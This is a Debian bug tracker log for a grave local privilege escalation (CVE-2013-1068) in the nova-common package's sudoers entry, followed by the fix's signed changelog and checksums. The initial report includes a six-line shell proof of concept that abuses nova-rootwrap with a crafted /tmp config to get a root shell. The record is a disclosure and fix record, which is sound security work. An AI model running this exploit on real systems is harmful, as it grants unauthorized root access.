Debian Bug report logs -
#753579
nova: CVE-2013-1068: local privilege escalation
Reported by: Henri Salo <henri@nerv.fi>
Date: Thu, 3 Jul 2014 09:42:01 UTC
Severity: grave
Tags: confirmed, security
Found in version nova/2014.1.1-1
Fixed in versions nova/2012.1.1-18, nova/2014.1.1-4
Done: Thomas Goirand <zigo@debian.org>
Bug is archived. No further changes may be made.
Toggle useless messages
Report forwarded
to debian-bugs-dist@lists.debian.org, PKG OpenStack <openstack-devel@lists.alioth.debian.org>:
Bug#753579; Package nova-common.
(Thu, 03 Jul 2014 09:42:05 GMT) (full text, mbox, link).
Acknowledgement sent
to Henri Salo <henri@nerv.fi>:
New Bug report received and forwarded. Copy sent to PKG OpenStack <openstack-devel@lists.alioth.debian.org>.
(Thu, 03 Jul 2014 09:42:05 GMT) (full text, mbox, link).
Message #5 received at submit@bugs.debian.org (full text, mbox, reply):
[Message part 1 (text/plain, inline)]
Package: nova-common
Version: 2014.1.1-1
Severity: grave
Tags: security, confirmed
After installing nova-common file /etc/sudoers.d/nova-common is created. If
/etc/sudoers contains "#includedir /etc/sudoers.d" nova is vulnerable to
CVE-2013-1068 local privilege escalation. Vulnerability does not need working
OpenStack installation. If I am correct OpenStack does not work without
includedir configuration so it might be usually enabled in OpenStack
instances.
PoC: https://bugs.launchpad.net/ubuntu/+source/nova/+bug/1185019
"""
echo [DEFAULT] >/tmp/my-rootwrap.conf
echo filters_path=/tmp/my-filters.d >>/tmp/my-rootwrap.conf
mkdir /tmp/my-filters.d
echo [Filters] >/tmp/my-filters.d/my.filters
echo my-shell: CommandFilter, /bin/sh, root >>/tmp/my-filters.d/my.filters
sudo nova-rootwrap /tmp/my-rootwrap.conf sh
id
"""
-- System Information:
Debian Release: 7.5
APT prefers stable
APT policy: (500, 'stable')
Architecture: amd64 (x86_64)
Kernel: Linux 3.2.0-4-amd64 (SMP w/8 CPU cores)
Locale: LANG=en_US.UTF-8, LC_CTYPE=en_US.UTF-8 (charmap=UTF-8) (ignored: LC_ALL set to en_US.UTF-8)
Shell: /bin/sh linked to /bin/dash
[signature.asc (application/pgp-signature, inline)]
Marked as fixed in versions nova/2012.1.1-18.
Request was from Henri Salo <henri@nerv.fi>
to control@bugs.debian.org.
(Thu, 03 Jul 2014 10:30:07 GMT) (full text, mbox, link).
Reply sent
to Thomas Goirand <zigo@debian.org>:
You have taken responsibility.
(Thu, 03 Jul 2014 13:30:25 GMT) (full text, mbox, link).
Notification sent
to Henri Salo <henri@nerv.fi>:
Bug acknowledged by developer.
(Thu, 03 Jul 2014 13:30:25 GMT) (full text, mbox, link).
Message #12 received at 753579-close@bugs.debian.org (full text, mbox, reply):
Source: nova
Source-Version: 2014.1.1-4
We believe that the bug you reported is fixed in the latest version of
nova, which is due to be installed in the Debian FTP archive.
A summary of the changes between this version and the previous one is
attached.
Thank you for reporting the bug, which will now be closed. If you
have further comments please address them to 753579@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.
Debian distribution maintenance software
pp.
Thomas Goirand <zigo@debian.org> (supplier of updated nova package)
(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmaster@ftp-master.debian.org)
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256
Format: 1.8
Date: Thu, 03 Jul 2014 20:25:51 +0800
Source: nova
Binary: python-nova nova-common nova-compute nova-compute-lxc nova-compute-uml nova-compute-qemu nova-compute-kvm nova-conductor nova-cert nova-scheduler nova-volume nova-api nova-network nova-console nova-consoleauth nova-doc nova-cells nova-baremetal nova-consoleproxy
Architecture: source all
Version: 2014.1.1-4
Distribution: unstable
Urgency: high
Maintainer: PKG OpenStack <openstack-devel@lists.alioth.debian.org>
Changed-By: Thomas Goirand <zigo@debian.org>
Description:
nova-api - OpenStack Compute - compute API frontend
nova-baremetal - Openstack Compute - baremetal virt
nova-cells - Openstack Compute - cells
nova-cert - OpenStack Compute - certificate manager
nova-common - OpenStack Compute - common files
nova-compute - OpenStack Compute - compute node
nova-compute-kvm - OpenStack Compute - compute node (KVM)
nova-compute-lxc - OpenStack Compute - compute node (LXC)
nova-compute-qemu - OpenStack Compute - compute node (QEmu)
nova-compute-uml - OpenStack Compute - compute node (UserModeLinux)
nova-conductor - OpenStack Compute - conductor service
nova-console - OpenStack Compute - console
nova-consoleauth - OpenStack Compute - Console Authenticator
nova-consoleproxy - OpenStack Compute - NoVNC proxy
nova-doc - OpenStack Compute - documentation
nova-network - OpenStack Compute - network manager
nova-scheduler - OpenStack Compute - virtual machine scheduler
nova-volume - OpenStack Compute - storage metapackage
python-nova - OpenStack Compute - libraries
Closes: 753579
Changes:
nova (2014.1.1-4) unstable; urgency=high
.
* CVE-2013-1068: Fixed sudoers file (Closes: 753579).
Checksums-Sha1:
b9f7b2e677ce5401b1179141c479af13a3296de5 4595 nova_2014.1.1-4.dsc
b90b5c0f39768e4bc5a4e23bf88cd4ee4d389215 161616 nova_2014.1.1-4.debian.tar.xz
c9d78ee6ae52bf15e258c1c0dd8e69ff37b0b7b5 1702758 python-nova_2014.1.1-4_all.deb
697d2f1d7e2f4de1143a87c676fbf52c1aebe6b4 72208 nova-common_2014.1.1-4_all.deb
1617a61baf84a0e8f2faeb926525bc6e2eec9bc6 20280 nova-compute_2014.1.1-4_all.deb
cd974a7e2bef1ce0a286b9c598803309f5a4ff35 15646 nova-compute-lxc_2014.1.1-4_all.deb
d62936f94a79bd003de5433028a77d5d8414c4cb 15668 nova-compute-uml_2014.1.1-4_all.deb
e1110917dc6e5e9557a189fe7c6504a9cfec3bc6 15652 nova-compute-qemu_2014.1.1-4_all.deb
fa56476875188fb89b1c6507bc0be84aab032665 15772 nova-compute-kvm_2014.1.1-4_all.deb
e45997dd9d93bb3ce64e639095170cd75a1e3754 17842 nova-conductor_2014.1.1-4_all.deb
d75f3c7bb660286546bc732f381a530d9b229515 17948 nova-cert_2014.1.1-4_all.deb
f241d3fa7da2626cc9c07d0045ebbd2af57dd451 18888 nova-scheduler_2014.1.1-4_all.deb
c0e46ad58ea0d10413741f0750cc964f4012b316 15288 nova-volume_2014.1.1-4_all.deb
d952cb8fbb5d020a819f1c63805f307c181bf365 34072 nova-api_2014.1.1-4_all.deb
7aa67bf458a3a7fed1cf2d9cea3a970893df592a 20030 nova-network_2014.1.1-4_all.deb
ed78e842a30ca3becf766bb069839d84603890ad 17992 nova-console_2014.1.1-4_all.deb
f16d5f3b6d1d24e36b9a87c29b671f87734079e2 17944 nova-consoleauth_2014.1.1-4_all.deb
4cf1dc19e571b827acb0bd130254d0a220a6aa99 1305668 nova-doc_2014.1.1-4_all.deb
f2995dba7f9be8aaf927fd12dbdc59963a36611b 16946 nova-cells_2014.1.1-4_all.deb
c3295e14b47777b8964f2b44bc8a766039690e69 17294 nova-baremetal_2014.1.1-4_all.deb
adfd403a7cded0d50bf4b5c987aa8d1a6ff5e236 22718 nova-consoleproxy_2014.1.1-4_all.deb
Checksums-Sha256:
a69030478c7348a53d2cd86c963cc7a077fbc2b678152c8e706ad800c180e2da 4595 nova_2014.1.1-4.dsc
dbc7a39167f9adc9ba3e2321d37cbed2ab278bab141648378c1f0ca7b5741191 161616 nova_2014.1.1-4.debian.tar.xz
85193516432691e121a017d2fd76adcd14b0a59d608203fa3b171e7c8255fc0a 1702758 python-nova_2014.1.1-4_all.deb
7af7e87f275c1c7ab152b5fc7992216c799048e47d8515aefc2ef0df4ed54175 72208 nova-common_2014.1.1-4_all.deb
e040036faeccf38a3ca4360ab776192095d8199fd15bddd284f85524b9c50e0d 20280 nova-compute_2014.1.1-4_all.deb
22dd10cac4383ce12e29db0e8bf8942032b6fec135a49301c207df6bdba12d63 15646 nova-compute-lxc_2014.1.1-4_all.deb
0d8e55ad2a2c538e5a8066bece27cb422d8a925ba39bf3a6142f4f79822d0c1f 15668 nova-compute-uml_2014.1.1-4_all.deb
fe384dd2cb51299f5853e34fcdd35422d07934d23b9076528282bdf9532d6fcf 15652 nova-compute-qemu_2014.1.1-4_all.deb
7792e7eeb890d977f79e506c8641d1f3d7193a819b4203da6958d47be87f375f 15772 nova-compute-kvm_2014.1.1-4_all.deb
f5adaa7dd1ac67ddbc7ab72dae4605e49b04b02f1ffa37dd7e2cfae14f87542a 17842 nova-conductor_2014.1.1-4_all.deb
b373d934c9e7a5f82a0f6cc74699f4f2c9b5d23a0099556d6feee86614c625f5 17948 nova-cert_2014.1.1-4_all.deb
34da12dbc69620889ff4760f243ea3f99086136de305022fc3d100085ca494c7 18888 nova-scheduler_2014.1.1-4_all.deb
f1fad6978d4bde3a4053f6c0027ed208b405f39526b33ce7d7cd8566fdec0181 15288 nova-volume_2014.1.1-4_all.deb
c8a3709e11a0e0b364b75efa412a864de04e847624f014c1577d5f3c49f4c963 34072 nova-api_2014.1.1-4_all.deb
6253ba7c1e9d2b0a08df2cf79dec7a2ebd88ef67491cd7550cfe70a15cd25f3d 20030 nova-network_2014.1.1-4_all.deb
907e2a121b073a7b2b25af0df8897ca982d6986878ee6a0e5a7ce411dd3d9d1d 17992 nova-console_2014.1.1-4_all.deb
87eed402c8280d2ea502f8305cd178b48c5d09b7c4945fd5e88b3f0619998749 17944 nova-consoleauth_2014.1.1-4_all.deb
b80dc0954d62b4953c42a0ab02c52f3c6a14bf9d1e9c75dbfe96139ad1c63d0c 1305668 nova-doc_2014.1.1-4_all.deb
820522cac73699613075f47009eb5de9c07e5d1304dcfd4e0f94a29afd853cb7 16946 nova-cells_2014.1.1-4_all.deb
34bdd24965b40f9d2a891a7b7045a328e76e65d329d8deeb2b99460c8d4041b6 17294 nova-baremetal_2014.1.1-4_all.deb
27dffae4e9d150cb8db5e9d93c72eda6e1be0044141dc0d52284f8f1e6d74e42 22718 nova-consoleproxy_2014.1.1-4_all.deb
Files:
ac2b036278614a06e7c7ff75c1ceb2b9 1702758 python extra python-nova_2014.1.1-4_all.deb
21ab6f083e24eac865f1cad38a65c16e 72208 net extra nova-common_2014.1.1-4_all.deb
32524a3f90d24dfcc8fa57831db98489 20280 net extra nova-compute_2014.1.1-4_all.deb
703f018330731f8ad7a5abf1c6a27740 15646 net extra nova-compute-lxc_2014.1.1-4_all.deb
a970fecff41316e098ec4433cd3afd55 15668 net extra nova-compute-uml_2014.1.1-4_all.deb
d2b0d0525dd968c651c9476614b03e1e 15652 net extra nova-compute-qemu_2014.1.1-4_all.deb
9d4bd080ef46b223b10d971ffa170984 15772 net extra nova-compute-kvm_2014.1.1-4_all.deb
fe686a157c5c9e66976cd8d060f5f9e1 17842 net extra nova-conductor_2014.1.1-4_all.deb
9f5949ee1798ae706181b309f554d7f3 17948 net extra nova-cert_2014.1.1-4_all.deb
76c318c6a5b2db92d3b52069b15f024c 18888 net extra nova-scheduler_2014.1.1-4_all.deb
a0f6e65447f4d026085c3a6aa402403f 15288 oldlibs extra nova-volume_2014.1.1-4_all.deb
6a3cc9e951bb32aafa4b1e968fa3aac0 34072 net extra nova-api_2014.1.1-4_all.deb
99b576ab463ee00848798904940fec91 20030 net extra nova-network_2014.1.1-4_all.deb
0ecdeb9a6f5fe83c850011e8499bc68e 17992 net extra nova-console_2014.1.1-4_all.deb
644e929cf8212e7cf317d728f8cdfe70 17944 net extra nova-consoleauth_2014.1.1-4_all.deb
ae927e1eccf5108d214edeb02f1dee52 1305668 doc extra nova-doc_2014.1.1-4_all.deb
49acc1b9451ad1f9118992a10971239c 16946 net extra nova-cells_2014.1.1-4_all.deb
fb02536cc37222dab538fa954b0ba81e 17294 net extra nova-baremetal_2014.1.1-4_all.deb
42e29cbadff7c57aaa61e5da68380489 22718 net extra nova-consoleproxy_2014.1.1-4_all.deb
76d50f5b06610c96747abde8373e5ed5 4595 net extra nova_2014.1.1-4.dsc
d773a731b04cfc04d24d377aaf062aa7 161616 net extra nova_2014.1.1-4.debian.tar.xz
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1
iQIcBAEBCAAGBQJTtVWMAAoJENQWrRWsa0P+kIoQAJda5NRYRwLddikc8QwHT5ph
nC3fhw4MayxGUaIAQnlLC6EtMNwY/jsXL7/hTBQWQot21HzXBmYL27oAVW65Itvj
BGKWyK7oZt5xaMoHnjOUHK7REq2VCbjYPklhkAftnXdozZqkh6kVlvCN5sB4nkOU
neczYBr6f9m5B0Ukb6TpK3N+hOTX3+ObBirt4+lE9h4bHchVmNoT8hfKOwzBe/ac
LBftQwlCyUeqoyzygXU/GgEw5vQQGbdhuT/ucUmKs7VtTDqtKQLa4Tr80ax9ctHJ
eoRQuj2M31QxpJtUs6BkuB91gmW9X7HHwc2+F9NyRJ73fPquMvyPnVT2RbE95VBY
Bpx0NXNnM6QYINH3P7vqdrrHzLHq9212VPgxnb7J2Ej1vnEC/sUWcDLQBzn55oJx
HH7pb1EUFj7Hz7QWDcP8qSY6i3CYd0dTzPDql3cRXU3mogzPaA8+ac3b+WoOMrYi
qXLsWBR7Up0HsDMY/VbU4y3/l3cX/BUuD73uRAiOQozwWNSA342Pf3t3tW0bJ98m
oz3yw7/95oyES/4IPf+Sh8GdTKMBL24us4OsAP8xlkB0jnHYOAHkMraLfdPUdmFJ
KrMZPcsBKJQ4ZsiN9tJ1Ov3JNf5aLcHxiLMCubD5lv/M3vQH11jlza3G23hTtBty
diWAC5BktvqWmIB3ZTXg
=DHvt
-----END PGP SIGNATURE-----
Bug archived.
Request was from Debbugs Internal Request <owner@bugs.debian.org>
to internal_control@bugs.debian.org.
(Fri, 01 Aug 2014 07:31:41 GMT) (full text, mbox, link).
Send a report that this bug log contains spam.
Debian bug tracking system administrator <owner@bugs.debian.org>.
Last modified:
Wed Jun 19 16:56:44 2019;
Machine Name:
beach
Debian Bug tracking system
Debbugs is free software and licensed under the terms of the GNU
Public License version 2. The current version can be obtained
from https://bugs.debian.org/debbugs-source/.
Copyright © 1999 Darren O. Benham,
1997,2003 nCipher Corporation Ltd,
1994-97 Ian Jackson,
2005-2017 Don Armstrong, and many other contributors.
Vulmon